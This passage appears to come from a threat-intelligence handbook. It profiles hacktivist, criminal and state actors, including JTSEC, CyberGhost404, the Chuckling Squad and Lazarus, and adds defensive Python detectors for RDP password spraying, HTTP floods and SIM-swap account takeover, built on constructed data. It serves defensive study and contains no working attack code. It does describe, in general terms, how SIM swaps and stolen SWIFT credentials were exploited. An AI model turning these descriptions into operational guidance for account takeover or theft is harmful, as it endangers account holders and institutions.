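constructed key=value rendering of Security events 4624/4625, and the
internal ranges are assumptions."""
import ipaddress
from collections import defaultdict

RDP_LOGON_TYPE = "10"       # RemoteInteractive
SPRAY_MIN_ACCOUNTS = 5      # distinct accounts failing from one source
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def parse(line):
    """'k=v k=v' into a dict; values in this constructed layout never contain spaces."""
    return dict(token.split("=", 1) for token in line.split())

def is_external(ip):
    """True when the source is a routable address outside INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:      # "-" or a hostname: not a routable source
        return False
    return not any(addr in net for net in INTERNAL_NETS)

def analyse(lines):
    external_logons = []
    failures = defaultdict(set)   # source ip -> accounts that failed from it
    for n, line in enumerate(lines, 1):
        ev = parse(line)
        if ev.get("logon_type") != RDP_LOGON_TYPE:
            continue
        src = ev.get("src_ip", "-")
        if ev.get("event_id") == "4624" and is_external(src):
            external_logons.append((n, ev.get("account"), src))
        elif ev.get("event_id") == "4625":
            failures[src].add(ev.get("account"))
    spraying = {src: sorted(accts) for src, accts in failures.items() if len(accts) >= SPRAY_MIN_ACCOUNTS}
    return {"external_rdp_logons": external_logons, "password_spraying": spraying}

# Constructed sample: one internal RDP logon, a console logon, five failures
# against distinct accounts from one outside address, then a success from it.
SAMPLE_EVENTS = [
    "event_id=4624 logon_type=10 account=jdoe src_ip=10.0.5.23",
    "event_id=4624 logon_type=2 account=admin src_ip=-",
    "event_id=4625 logon_type=10 account=admin src_ip=203.0.113.9",
    "event_id=4625 logon_type=10 account=administrator src_ip=203.0.113.9",
    "event_id=4625 logon_type=10 account=backup src_ip=203.0.113.9",
    "event_id=4625 logon_type=10 account=jdoe src_ip=203.0.113.9",
    "event_id=4625 logon_type=10 account=svc_sql src_ip=203.0.113.9",
    "event_id=4624 logon_type=10 account=svc_sql src_ip=203.0.113.9",
    "event_id=4625 logon_type=10 account=jdoe src_ip=10.0.5.23",
]

def demo():
    return analyse(SAMPLE_EVENTS)

if __name__ == "__main__":
    result = demo()
    for n, account, src in result["external_rdp_logons"]:
        print(f"line {n}: external RDP logon as {account} from {src}")
    for src, accounts in result["password_spraying"].items():
        print(f"spraying from {src}: {', '.join(accounts)}")
```

The success on line 8 is the event worth paging on: it is a valid credential used from the address that had just cycled through five accounts, which is what a credential bought from a broker looks like on the wire. A single mistyped password from an internal workstation (line 9) stays below the spraying threshold by design.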

Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Alias: ATK 139, JTSEC, JTSEC3313, JTSEC1333, JTSEC1, TAG-HA12
Threat actor type (profile checklist): Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Financial Services, Government Agencies
Motivations & objectives: Ideology
Score: 20
Language: English, French

DESCRIPTION
JTSEC is a hacktivist threat actor affiliated with the Anonymous collective. He has been active since at least the end of 2016. JTSEC has taken part in various hacktivist campaigns over the years. His activity is focused on scanning websites as part of the campaigns, publishing the results on Pastebin and then sharing them on his personal Twitter account. The scans are performed for reconnaissance purposes, as they retrieve abundant information about the scanned websites, which can be leveraged by a potential attacker should he decide to target one of them. In addition, he also occasionally shares target lists for some of the campaigns.

TOOLS, MALWARES AND VULNERABILITIES
Malwares
- None Identified
Publicly available tools
- Nmap
- SubFinder
- wig
- Metasploit
- Aquatone
Legitimate software
- None Identified
Exploited vulnerabilities
- None Identified



Targeted Countries _
China, Ecuador, France, Gabon, Israel, Japan, Nicaragua, Saudi Arabia, Spain, Sudan, United Arab Emirates, United Kingdom, United States, Venezuela

Assumed origin of the attacker: Canada

CAMPAIGNS
2016 - Present - #OpDeathEaters
Cyber campaign against pedophiles and child trafficking networks.

2017 - 2017 - #OpBeast
Hacktivist cyber camp aign against zoophilia and bestiality.

2017 - 2017 - #OpNazi
Hacktivist cyber campaign against Nazi and white supremacist organizations.

2017 - 2018 - #OpSpain/#OpEspana
Hacktivist cyber campaign against Spanish targets. The campaign resurfaced in 2018 in protest against the arrest of a hacktivist dubbed AnonXeljomudoX, who was accused by the Spanish authorities of attacking Spain's National Intelligence Centre (CNI) during the Catalan elections.

2017 - Present - HunterUnit
Hacktivist cyber campaign against pedophiles' websites. It appears JTSEC is the main actor active in this campaign.

2017 - Present - #OpIcarus
OpIcarus is a hacktivist cyber operation launched by Anonymous in 2016 against websites and services associated with the global financial system.

2017 - Present - #OpIsis
Hacktivist cyber campaign launched by Anonymous in 2015 against websites and targets associated with the Islamic State (ISIS).

2018 - 2018 - #OpCatalonia
Hacktivist cyber campaign, first launched in 2017, that targets Spanish targets in support of Catalonia's independence.

2018 - 2018 - #OpFrance
Hacktivist campaign first launched by Anonymous in solidarity with the Yellow Vests movement (Mouvement des Gilets Jaunes) in France.

2018 - 2018 - #OpJamalKhashoggi
Hacktivist campaign against Saudi Arabia, launched by Anonymous in October 2018 in response to the assassination of the Saudi journalist Jamal Khashoggi in the Saudi consulate in Istanbul.

2018 - 2018 - #Op_Tibet
Hacktivist cyber campaign against the Chinese regime in support of Tibet.

2018 - Present - #OpDomesticTerrorism
Hacktivist cyber campaign launched by Anonymous in 2017 against white supremacist and alt-right targets.

2018 - Present - #OpGabon
Hacktivist campaign by Anonymous against Gabonese targets in protest against the alleged ritual killings of Gabonese citizens.

2018 - Present - #OpIsrael
A pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013.

2018 - Present - #OpKilluminati
Hacktivist campaign against secret societies, such as Freemasonry.

2018 - Present - #OpNicaragua
Hacktivist campaign against the government of Nicaragua in protest against its repression of protest movements in the country.

2018 - Present - #OpVenezuela
Hacktivist campaign against the Venezuelan government.

2018 - Present - #OpWhales
Hacktivist campaign against countries engaged in whale hunting, mainly Japan, the Faroe Islands and Norway.

2019 - #OpAssange
Hacktivist campaign targeting the government of Ecuador in response to Ecuador's withdrawal of asylum from the WikiLeaks founder Julian Assange and his subsequent arrest by the UK authorities. JTSEC also scanned some UK websites in the course of this campaign.

2019 - #OpChildSafety
Hacktivist campaign against pedophilia-related websites.

2019 - #OpSudan
Hacktivist campaign against Sudanese governmental targets.

MODUS OPERANDI (ATT&CK FRAMEWORK)




Discovery
- T1018 - Remote System Discovery
- T1046 - Network Service Scanning
- T1063 - Security Software Discovery
- T1082 - System Information Discovery

Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Alias: ATK 121, CyberGhost404, TAG-HA8
Threat actor type (profile checklist): Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Education, Financial Services, Government Agencies, Media
Motivations & objectives: Ideology
Score: 18
Language: English, Filipino

DESCRIPTION
CyberGhost404 is a hacktivist threat actor affiliated with the Anonymous collective. The threat actor has been active since at least March 2018 (when he joined Twitter). He declares himself the founder of the Filipino hacktivist group dubbed Philippine Cyber Eagles. The threat actor has been engaged in several hacktivist campaigns, among them #OpIsrael, #OpSudan and #OpAssange. He mainly publishes claims of having taken multiple websites offline, and on several occasions he has claimed to have leaked data from targeted entities, sharing links to the stolen data on Pastebin. On one occasion, he has also shared a target list. The threat actor has also claimed to have taken additional targets offline outside the context of a hacktivist campaign, possibly as a display of his capabilities.

CAMPAIGNS
2019 - #OpAssange
Hacktivist campaign targeting the government of Ecuador and targets in the UK in response to Ecuador's withdrawal of asylum from the WikiLeaks founder Julian Assange and his subsequent arrest by the UK authorities. The threat actor shared a list of Ecuadorian governmental websites that had allegedly been taken offline, claimed to have taken offline various websites of local councils in the UK, and shared a link to an alleged data leak from UK local police departments.

2019 - #OpIsrael
A pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013. The threat actor claimed to have taken several Israeli websites offline.

2019 - #OpSudan
A cyber campaign that supports the protests against the Sudanese government. The threat actor claimed to have taken several Sudanese governmental websites offline.

2019 - #OpVietnam
A hacktivist cyber campaign against the Vietnamese government and its anti-cybercrime authority in retaliation for the alleged hacking of many Filipino Facebook accounts by Vietnamese hackers, and demanding their arrest. The threat actor only shared a link to a target list on Pastebin and did not take responsibility for participating in active attacks as part of this campaign.

2018 - 2019 - targeting Indian entities
In November 2018, the threat actor shared a link to leaked data he had extracted from the Indian Institute of Technology Guwahati, an academic institute situated in the city of Guwahati in India. In May 2019, the threat actor shared a link to leaked data he had extracted from the Cement Corporation of India Limited.

2019 - targeting Philippine entities
Throughout 2019, the threat actor claimed to have carried out DDoS attacks against three Philippine websites.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: Denial of Service attack tool made by CyberGhost404
Tools used by multiple adversaries: None identified
Publicly available tools: None identified
Legitimate software: None identified
Exploited vulnerabilities: None identified

196 The Cyberthreat Handbook • Thales - Verint


Targeted Countries _
Ecuador
India
Israel
Philippines
Sudan
United Kingdom
Vietnam

Assumed origin of the attacker: The Philippines

MODUS OPERANDI (ATT&CK FRAMEWORK)
Collection: T1005 - Data from Local System
Impact: T1498 - Network Denial of Service
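The website takedowns this actor claims map to T1498 (Network Denial of Service); against a web application the same effect is usually produced by an HTTP request flood, which is visible in the access log before any link saturates. The detector below is an added example for this handbook, not the actor's tool or the handbook's own code. It reads Apache/Nginx combined-format lines and raises two kinds of alert: a per-client alert when a single IP exceeds a request threshold inside a sliding window, and an aggregate alert when the site as a whole does, which is what still catches a distributed flood made of low-rate sources. All log lines are constructed for the example and the addresses come from documentation ranges.

```python
"""Sliding-window detection of HTTP request floods in web server access logs.

Added example, not part of the handbook. Parses combined-format access log
lines and flags (a) single sources exceeding a per-IP rate and (b) aggregate
surges that a distributed flood of two-request sources cannot evade.
Sample traffic is constructed below; nothing here is read from a real server.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, request, status) for a combined-format line, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("req"), int(m.group("status"))


def _events(lines):
    for line in lines:
        parsed = parse_line(line)
        if parsed is not None:
            yield parsed[0], parsed[1]


def detect_per_ip_floods(lines, window_seconds=10, threshold=20):
    """Map each offending IP to the moment its request count first exceeded
    `threshold` inside the sliding window. Lines must be in time order."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)
    alerts = {}
    for ip, ts in _events(lines):
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:          # drop requests older than the window
            q.popleft()
        if len(q) > threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts


def detect_aggregate_surges(lines, window_seconds=10, threshold=40):
    """Return one (time, requests_in_window, distinct_sources) tuple at the start
    of each run of windows whose total volume exceeds `threshold`, regardless
    of how many sources contribute."""
    window = timedelta(seconds=window_seconds)
    recent = deque()
    alerts = []
    exceeding = False
    for ip, ts in _events(lines):
        recent.append((ts, ip))
        while ts - recent[0][0] > window:
            recent.popleft()
        if len(recent) > threshold:
            if not exceeding:
                alerts.append((ts, len(recent), len({src for _, src in recent})))
                exceeding = True
        else:
            exceeding = False
    return alerts


def build_sample_log():
    """Constructed traffic: three normal clients, one single-source burst of 50
    requests in 5 seconds, and one distributed burst of 30 sources sending
    two requests each within 2 seconds."""
    t0 = datetime(2019, 4, 7, 10, 0, 0, tzinfo=timezone.utc)
    events = []
    for k in range(5):
        for ip in ("192.0.2.10", "192.0.2.11", "192.0.2.12"):
            events.append((t0 + timedelta(seconds=12 * k), ip, "GET /index.html"))
    for i in range(50):
        events.append((t0 + timedelta(seconds=30 + i // 10), "203.0.113.7", "GET /"))
    for second in (60, 61):
        for n in range(1, 31):
            events.append((t0 + timedelta(seconds=second), f"198.51.100.{n}", "GET /"))
    events.sort(key=lambda e: e[0])        # stable sort keeps same-second order
    return [f'{ip} - - [{ts.strftime(TS_FMT)}] "{req} HTTP/1.1" 200 512'
            for ts, ip, req in events]


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for ip, when in detect_per_ip_floods(SAMPLE_LOG).items():
        print(f"per-IP flood: {ip} from {when.isoformat()}")
    for when, total, sources in detect_aggregate_surges(SAMPLE_LOG):
        print(f"aggregate surge at {when.isoformat()}: {total} requests from {sources} sources")
```

On the constructed sample the per-IP check names only 203.0.113.7, while the aggregate check fires twice: once during that burst and again for the 30-source burst, where no single address ever exceeds two requests. Thresholds and window length have to be tuned against a site's own baseline; the point of keeping both checks is that a flood tuned to stay under the per-IP limit still shows up as volume.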

197
Alias _: ATK 124, CHUCKLING HELLA, CHUCKLING SQUAD, TAG-HA16, THE CHUCKLING SQUAD
Threat Actor _: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown (the index lists this actor under both Cyber criminal and Hacktivist)
Targeted Sectors _: Communication, Media, Retail
Motivations & Objectives _: Personal-satisfaction
Language: Unknown
Assumed origin of the attacker: United States (as indexed under origins)
DESCRIPTION
The Chuckling Squad is a group of hackers active since at least August 2019. The group has targeted and hijacked the Twitter accounts of YouTubers and other social media influencers. Among the attacked influencers were @KingBach, @shanedawson, @jamescharles, @BigJigglyPanda, @zane, @I_AM_WILDCAT, @AmandaCerny, @LyricaLemonade and @Etika; the last and best-known hijacked account was @jack, belonging to Twitter CEO Jack Dorsey. It was reported that the attacks were executed by tricking or bribing call-centre workers of a specific mobile phone operator into performing SIM swaps. A SIM swap is the process that moves a phone number from one SIM card to another. Once the number has been moved, the attacker receives the owner's calls and SMS messages, so any recovery passcode delivered by SMS, combined with whatever credentials were already obtained, ends up with the attacker: every control that trusts the phone number alone moves with the number. After gaining access to the Twitter accounts, the hackers mostly posted offensive tweets of an anti-Semitic and racist nature. They submitted the tweets through an external service that posts tweets sent to it by SMS from the registered phone number, so control of the number was enough to post. Little is known about the hackers and their motives, but we assume that their activity is aimed at gaining notoriety in hacking-related circles. While conducting the attacks, the group opened a Discord channel for discussions related to the attacks; the account was suspended, and it might have been intended for future activity involving hackers from the group.
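The takeovers described above worked because the phone number, not the person, was the trust anchor: after a SIM swap, SMS-delivered recovery codes and SMS-originated posts all belong to whoever holds the new SIM. The detector below is an added example, not code from the handbook or from any operator or platform. It joins a carrier SIM-change feed with application authentication events and flags every SMS-dependent action that follows a SIM change on the same number within a short window, while ignoring SIM changes the carrier performed in person. Both event streams, their field names and the channel values are constructed for the example; a real deployment would take the SIM-change feed from the carrier.

```python
"""Correlate carrier SIM-change events with SMS-dependent account actions.

Added example, not part of the handbook. Event formats are invented:
'<iso-utc-time> <kind> key=value key=value ...'.
"""
from datetime import datetime, timedelta, timezone

# Constructed carrier feed: one swap done through the call centre (the path the
# attackers used) and one legitimate in-store device upgrade.
SIM_CHANGE_EVENTS = [
    "2019-08-30T14:02:11Z sim_change msisdn=+15550100001 channel=call_center",
    "2019-07-01T09:00:00Z sim_change msisdn=+15550100003 channel=store",
]

# Constructed application events. sms_otp_used: an SMS-delivered code was
# accepted; sms_post: a message was published from an inbound SMS.
AUTH_EVENTS = [
    "2019-08-30T14:20:45Z sms_otp_used msisdn=+15550100001 account=@victim action=password_reset",
    "2019-08-30T14:25:03Z sms_post msisdn=+15550100001 account=@victim",
    "2019-08-30T09:10:00Z sms_otp_used msisdn=+15550100002 account=@bystander action=login",
    "2019-09-12T10:00:00Z sms_post msisdn=+15550100001 account=@victim",
    "2019-07-01T08:30:00Z sms_otp_used msisdn=+15550100003 account=@upgrader action=login",
    "2019-07-02T12:00:00Z sms_otp_used msisdn=+15550100003 account=@upgrader action=login",
]

SEVERITY = {"password_reset": "high", "login": "high", "sms_post": "medium"}


def parse_event(line):
    """Parse one event line into a dict with a timezone-aware 'ts' and a 'kind'."""
    ts_str, kind, *pairs = line.split()
    event = dict(pair.split("=", 1) for pair in pairs)
    event["ts"] = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    event["kind"] = kind
    return event


def index_sim_changes(lines, trusted_channels=frozenset({"store"})):
    """msisdn -> sorted SIM-change times, skipping channels where the carrier
    verified the customer in person (assumed to be the 'store' channel here)."""
    by_number = {}
    for ev in map(parse_event, lines):
        if ev["kind"] == "sim_change" and ev.get("channel") not in trusted_channels:
            by_number.setdefault(ev["msisdn"], []).append(ev["ts"])
    for times in by_number.values():
        times.sort()
    return by_number


def correlate(sim_lines, auth_lines, window=timedelta(hours=72),
              trusted_channels=frozenset({"store"})):
    """Alert on every SMS-dependent action that occurs within `window` after the
    most recent untrusted SIM change on the same number."""
    changes = index_sim_changes(sim_lines, trusted_channels)
    alerts = []
    for ev in sorted(map(parse_event, auth_lines), key=lambda e: e["ts"]):
        if not ev["kind"].startswith("sms_"):
            continue
        prior = [t for t in changes.get(ev["msisdn"], []) if t <= ev["ts"]]
        if not prior:
            continue                      # no SIM change before this action
        age = ev["ts"] - prior[-1]
        if age > window:
            continue                      # change too old to be the cause
        action = ev.get("action", ev["kind"])
        alerts.append({
            "account": ev["account"],
            "msisdn": ev["msisdn"],
            "action": action,
            "minutes_since_sim_change": int(age.total_seconds() // 60),
            "severity": SEVERITY.get(action, "medium"),
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SIM_CHANGE_EVENTS, AUTH_EVENTS):
        print(alert)
```

On the constructed data only the two @victim actions fire (a password reset 18 minutes after the call-centre swap, then an SMS post 22 minutes after it); the bystander has no SIM change, the later @victim post is outside the window, and the in-store upgrade is suppressed by the trusted-channel rule. Treating the carrier's channel as a trust signal is a design choice to keep the alert volume usable; if the feed does not carry it, the same correlation still works with every change treated as untrusted.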

CAMPAIGNS
 None identified

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: None identified
Tools used by multiple adversaries: None identified
Publicly available tools: None identified
Legitimate software: None identified
Exploited vulnerabilities: None identified

198


Targeted Countries _
United States

MODUS OPERANDI (ATT&CK FRAMEWORK)

199
Alias _: ATK3, BUREAU 121, HIDDEN COBRA, LAZARUS
Threat Actor _: State Sponsored
Targeted Sectors _: Aerospace, Financial Services, Government Agencies, Media, Military
Motivations & Objectives _: Strategic Support
Language: Unknown

DESCRIPTION
Lazarus is not a single threat group. It represents Bureau 121, one of the eight bureaus of the Reconnaissance General Bureau (RGB). Bureau 121 is the primary office tasked with cyber operations. It was reorganized in September 2016 and is now composed of:
- Lab 110: the key cyber unit under the RGB; it applies cyberattack techniques to conduct intelligence operations.
  • Office 98: primarily collects information on North Korean defectors, the organizations that support them, overseas research institutes related to North Korea, and university professors in South Korea.
  • Office 414: gathers information on overseas government agencies, public agencies and private companies.
  • Office 35: concentrates on developing malware and on researching and analyzing vulnerabilities, exploits and hacking tools.
- Unit 180: specialized in conducting cyber operations to steal foreign money from outside North Korea.
- Unit 91:
  • focuses on cyberattack missions targeting isolated networks, particularly South Korea's critical national infrastructure such as KHNP and the ROK Ministry of National Defense;
  • steals confidential information and technology to develop weapons of mass destruction.
- 128 and 413 Liaison Offices: responsible for hacking foreign intelligence websites and for training cyber experts.

Bureau 121 conducts three main types of operations:
- Cyber espionage: the Lazarus units have conducted multiple cyber espionage operations, such as the Kimsuky campaign and Operation KHNP. These operations have different objectives, such as tracking North Korean dissidents, collecting intellectual property that helps the development of weapons of mass destruction, or political espionage.
- Cyber terrorism: in 2013 North Korea conducted disruptive attacks on South Korean media and financial companies (Operation DarkSeoul), and it was responsible for the November 2014 Sony hack linked to the movie "The Interview". These attacks occurred before the 2016 reorganization of Bureau 121, which is why we cannot tell which unit is currently responsible for disruptive operations.
- Money theft: one of the missions of Bureau 121 is to collect liquidity to finance these cyber activities and the DPRK itself. This is done by spreading ransomware, such as the infamous WannaCry, which collected $91,000, and through bank robbery. Cyber bank robbery is carried out by infiltrating the bank's network, stealing the SWIFT credentials and using them to initiate transactions to an account controlled by the attacker. The best-known case is the Bangladesh Central Bank heist of February 2016, which allowed the theft of $81m. This activity is carried out by Unit 180, whose objectives are similar to those of the North Korean threat group APT38, aka Stardust Chollima or BlueNoroff.

Bureau 121 is supported by other units of the General Staff Department:
- The Operation Bureau: tasked with defining cyber strategies and planning operations.
- The Command Automation Bureau, composed of three units:
  • Unit 31: responsible for malware development (seemingly redundant with Office 35);
  • Unit 32: responsible for military software development;
  • Unit 56: responsible for command and control software development.
- The Enemy Collapse Sabotage Bureau: tasked with information and psychological warfare.

A cyber operation involves the interaction of these different teams. For example, the Operation Bureau defines an objective, Office 35 finds a usable exploit, Unit 31 develops the backdoor and the lure documents with the help of the Enemy Collapse Sabotage Bureau to produce effective spear-phishing documents, and Unit 56 develops the C2 software and maintains the C2 infrastructure that Lab 110, Unit 180 or Unit 91 then use to achieve the objective.

Because of this configuration, tool and infrastructure overlap between the different operational units is to be expected. For a defender this means that an indicator match against "Lazarus" tooling identifies the umbrella organisation rather than the mission: the same backdoor or C2 server may serve an espionage, a disruptive or a financial operation.

200


Targeted Countries _
South Korea
United States

Assumed origin of the attacker: North Korea

Reference: 2019, The All-Purpose Sword: North Korea's Cyber Operations and Strategies, https://ccdcoe.org/uploads/2019/06/Art_08_The-All-Purpose-Sword.pdf

201
Index _

202


203

ORIGINS
Argentina - p. 182
Brazil - p. 148, 150, 140
Canada - p. 192
China - p. 38, 40, 44, 80, 106, 152, 156
Colombia - p. 88
France - p. 42, 60
Gaza Strip - p. 58
India - p. 48
Indonesia - p. 180
Iran - p. 26, 64, 76, 114
Italy - p. 144, 178
Latin America - p. 176
Lebanon - p. 94
North Korea - p. 50, 68, 200
Pakistan - p. 50
Palestinian National Authority - p. 136
Peru - p. 88
Russia - p. 14, 18, 30, 34, 72, 84, 100, 116, 162, 188, 190
Saudi Arabia - p. 130
Serbia - p. 160
South Korea - p. 96
Spain - p. 66
Syria - p. 126
The Philippines - p. 158, 196
Tunisia - p. 184
Ukraine - p. 66
United Kingdom - p. 160
United States - p. 160, 198
Unknown - p. 46, 54, 56, 82, 92, 104, 108, 112, 120, 164, 172
Venezuela - p. 88
Vietnam - p. 50
Worldwide - p. 134, 168

ATTACK TYPES
Cyber criminal - p. 46, 54, 56, 60, 66, 72, 88, 116, 120, 124, 130, 160, 190, 198
Hacktivist - p. 88, 96, 130, 140, 144, 148, 150, 158, 162, 168, 172, 178, 180, 182, 184, 188, 192, 198
State sponsored - p. 14, 18, 22, 26, 30, 34, 38, 40, 42, 44, 48, 50, 58, 64, 68, 76, 80, 82, 84, 92, 94, 96, 100, 104, 106, 108, 112, 114, 124, 136, 152, 156, 164, 176, 200
Terrorist - p. 126, 134, 136

TARGETS
Afghanistan - p. 18, 82, 136, 158, 168
Africa - p. 108
Algeria - p. 42, 136, 140
Angola - p. 148
Argentina - p. 66, 88, 140, 176, 168, 182
Armenia - p. 18, 66, 72, 82
Australia - p. 22, 88, 116, 134, 152, 184
Austria - p. 42, 46, 64, 66, 72
Azerbaijan - p. 14, 26, 64, 66, 72, 82
Bahamas - p. 140
Bahrain - p. 64
Bangladesh - p. 48, 50, 72, 140, 158, 168
Barbados - p. 140
Belarus - p. 18, 66, 72, 82, 84
Belgium - p. 14, 18, 82, 84, 176, 184
Bolivia - p. 88, 176
Brazil - p. 18, 50, 88, 176, 140, 144, 148, 150, 158, 162, 168
Bulgaria - p. 18, 66
Cambodia - p. 40, 140
Cameroon - p. 168
Canada - p. 18, 30, 66, 126, 136, 152, 158, 168, 176
Central African Republic - p. 158
Central Asia - p. 44, 64, 84, 108
Ceylon - p. 48
Chechnya - p. 14
Chile - p. 50, 120, 136
China - p. 18, 22, 42, 44, 48, 66, 88, 94, 96, 104, 120, 136, 152, 158, 176, 192
Colombia - p. 88, 140, 148, 162, 176, 190
Congo - p. 172
Costa Rica - p. 140
Cuba - p. 176, 168
Cyprus - p. 72
Czech Republic - p. 14, 66, 72
Democratic Republic of the Congo - p. 42
Denmark - p. 136
Djibouti - p. 136
Dominican Republic - p. 88, 158
Eastern Asia - p. 38, 120
Eastern Europe - p. 38, 64
Ecuador - p. 88, 150, 162, 168, 176, 182, 192, 196
Egypt - p. 58, 112, 134, 136, 158
Estonia - p. 66
Europe - p. 42, 48, 54, 84
European Union - p. 140
France - p. 30, 60, 84, 88, 94, 116, 126, 134, 140, 144, 152, 158, 162, 172, 176, 184, 192

204


Gabon - p. 158, 172, 192
Georgia - p. 14, 18, 64, 66, 72
Germany - p. 18, 22, 30, 42, 72, 84, 88, 94, 120, 136, 140, 152, 158, 176
Ghana - p. 190
Greece - p. 30, 72, 82
Honduras - p. 150, 172
Hong Kong - p. 44, 68, 72, 80, 88, 150, 152
Hungary - p. 18, 14, 158, 184
India - p. 64, 82, 84, 88, 94, 104, 136, 140, 152, 158, 168, 190, 196
Indonesia - p. 80, 104, 140, 148, 150, 158, 162, 180, 188
Iran - p. 18, 42, 64, 76, 82, 84, 88, 112, 136, 158, 164
Iraq - p. 42, 64, 76, 84, 112, 136
Ireland - p. 14, 184
Israel - p. 26, 48, 58, 64, 72, 76, 88, 136, 140, 150, 162, 168, 172, 180, 184, 192, 196
Italy - p. 30, 66, 82, 84, 88, 94, 120, 144, 158, 162, 178
Japan - p. 18, 48, 68, 96, 106, 140, 152, 158, 192
Jordan - p. 58, 64, 66, 84, 94, 112, 136
Kazakhstan - p. 14, 18, 66, 72, 82, 84, 88
Kenya - p. 72
Kurdistan - p. 112
Kuwait - p. 26, 58, 66, 88, 108, 112, 136, 168
Kyrgyzstan - p. 14, 66, 72
Latvia - p. 18, 72, 136
Lebanon - p. 26, 94, 112, 136
Libya - p. 136
Luxembourg - p. 14
Macedonia - p. 136
Malaysia - p. 18, 42, 50, 66, 72, 104, 134, 158
Mali - p. 64, 158
Malta - p. 116
Mauritius - p. 26
Mexico - p. 50, 88, 120, 140, 158, 182
Middle East - p. 38, 64, 68, 84, 112, 114, 164
Moldova - p. 66
Mongolia - p. 18
Montenegro - p. 18
Morocco - p. 42, 82, 88, 112, 136
Myanmar - p. 168
Nepal - p. 94, 158, 168
Netherlands - p. 18, 42, 66, 84, 88, 94
Nicaragua - p. 140, 150, 172, 176, 192
Nigeria - p. 158
North America - p. 56, 64, 120
North Korea - p. 50, 96
Norway - p. 30
Oman - p. 136
Pakistan - p. 64, 82, 88, 94, 158, 184
Palestine - p. 136
Palestinian Authority - p. 66
Paraguay - p. 148
Peru - p. 88, 140, 162, 168, 176
Philippines - p. 22, 40, 44, 50, 80, 88, 94, 156, 158, 196
Poland - p. 14, 18, 30, 34, 50, 66, 72, 84, 88, 158, 168
Portugal - p. 14
Qatar - p. 26, 58, 94, 136
Romania - p. 14, 18, 66, 72, 84
Russia - p. 34, 42, 50, 64, 66, 72, 82, 84, 88, 94, 96, 124, 136, 152, 184
Saudi Arabia - p. 26, 64, 76, 84, 94, 100, 136, 140, 150, 172, 192
Serbia - p. 30, 72, 136
Singapore - p. 92, 152, 158
Slovakia - p. 18
Slovenia - p. 136
Somalia - p. 136
South Africa - p. 108
South America - p. 18, 38, 120
South China Sea - p. 48
South Korea - p. 18, 48, 68, 76, 88, 94, 96, 106, 136, 152, 168, 200
Southeast Asia - p. 22, 40, 38, 48, 92, 104, 120
Southern Asia - p. 64, 104
Spain - p. 14, 18, 30, 44, 66, 88, 124, 140, 162, 172, 176, 192
Sri Lanka - p. 48
Sudan - p. 140, 148, 150, 162, 168, 172, 188, 192, 196
Sweden - p. 18, 42, 88
Switzerland - p. 18, 46, 72, 82, 88, 94, 124
Syria - p. 42, 94, 114, 136, 168
Taiwan - p. 50, 66, 72, 80, 88, 96, 106, 120, 152, 156, 158
Tajikistan - p. 18, 66, 84
Thailand - p. 66, 94, 158, 168, 184
Tibet - p. 44
Tunisia - p. 158, 184
Turkey - p. 14, 18, 26, 30, 42, 44, 50, 64, 66, 72, 88, 136, 168
Turkmenistan - p. 82
Uganda - p. 14, 82
Ukraine - p. 14, 18, 34, 42, 66, 72, 82, 88, 176
United Arab Emirates - p. 64, 82, 88, 136, 140, 192
United Kingdom - p. 18, 30, 40, 42, 44, 48, 66, 72, 76, 84, 124, 126, 130, 134, 136, 140, 148, 150, 152, 158, 160, 168, 184, 192, 196

205
United Nations - p. 168
United States - p. 14, 18, 22, 26, 30, 40, 42, 44, 48, 50, 54, 58, 64, 66, 76, 82, 84, 88, 94, 116, 120, 124, 126, 130, 134, 136, 140, 148, 152, 156, 158, 160, 168, 176, 184, 190, 198, 200
Uruguay - p. 50, 88
Uzbekistan - p. 14, 72, 84
Venezuela - p. 88, 94, 140, 150, 158, 172, 176, 192
Vietnam - p. 22, 50, 66, 68, 72, 80, 82, 94, 156, 196
Western Europe - p. 38, 40, 64, 120
Yemen - p. 136
Zimbabwe - p. 168, 172

SECTORS
Administration - p. 22, 58, 88, 96, 144, 158, 160, 162, 178, 188
Aerospace - p. 18, 44, 68, 76, 82, 84, 88, 106, 136, 156, 184, 200
Aviation - p. 26, 30, 48, 76, 88, 134, 144, 158, 184, 190
Bank - p. 46
Casino and gaming - p. 88, 116, 130, 160
Chemicals - p. 68, 76
Communication - p. 22, 44, 76, 80, 88, 104, 116, 126, 130, 140, 148, 156, 168, 176, 178, 180, 184, 198
Construction - p. 184
Cybersecurity - p. 18, 88, 140, 178, 180, 190
Defense - p. 14, 18, 38, 44, 58, 64, 76, 84, 88, 94, 96, 104, 106, 126, 134, 136, 140, 144, 150, 152, 156, 158, 162, 176, 178, 188
Dissident - p. 76
Education - p. 26, 44, 58, 64, 76, 80, 88, 94, 116, 134, 140, 144, 148, 150, 152, 158, 160, 162, 168, 178, 184, 188, 190, 196
Embassies - p. 18, 48
Energy - p. 26, 30, 34, 38, 48, 54, 64, 76, 82, 100, 108, 116, 136, 162, 176, 182, 188, 190
Engineering - p. 92
Entertainment - p. 56
